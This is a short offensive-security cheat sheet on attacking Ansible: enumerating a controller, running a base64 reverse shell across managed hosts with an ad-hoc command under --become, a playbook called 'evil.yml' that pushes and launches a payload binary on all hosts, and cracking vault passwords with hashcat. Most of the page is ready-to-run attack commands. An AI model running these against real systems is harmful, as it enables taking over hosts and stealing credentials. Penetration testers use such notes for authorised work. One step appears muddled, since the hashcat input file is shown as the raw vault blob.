Ansible

Enumeration

When on ansible controller:

$ cat /etc/passwd | grep ans
$ cat /etc/ansible/hosts
$ ansible --version

Execute Code

Using ad-hoc commands:

$ ansible <GROUP_NAME> -m shell -a "echo <BASE64_REVERSE_SHELL>|base64 -d|/bin/bash" --become

Malicious playbook example:

evil.yml

# ansible-playbook evil.yml
- name: Evil playbook
  hosts: all
  gather_facts: true
  tasks:
    - name: upload
      copy:
        src: /tmp/met
        dest: /dev/shm/met
        mode: a+x
    - name: execute
      shell: "nohup /dev/shm/met &"
      async: 10
      poll: 0

Crack the Vault

When vault-encrypted creds are discovered, the vault passwords can be cracked with hashcat:

$ /usr/share/john/ansible2john.py vuln.yaml > vault.in
$ hashcat -m 16900 -O -a 0 -w 3 --session=vault -o vault.out vault.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule

The original password can then be decrypted with ansible:

$ cat vault.in
$ANSIBLE_VAULT;1.1;AES256
00000000000000000000000000000000000000000000000000000000000000000000000000000000
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
00000000000000000000000000000000000000000000000000000000000000000000000000000000
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
00000000000000000000000000000000000000000000000000000000000000000000

$ cat vault.in | ansible-vault decrypt

Last updated 1 year ago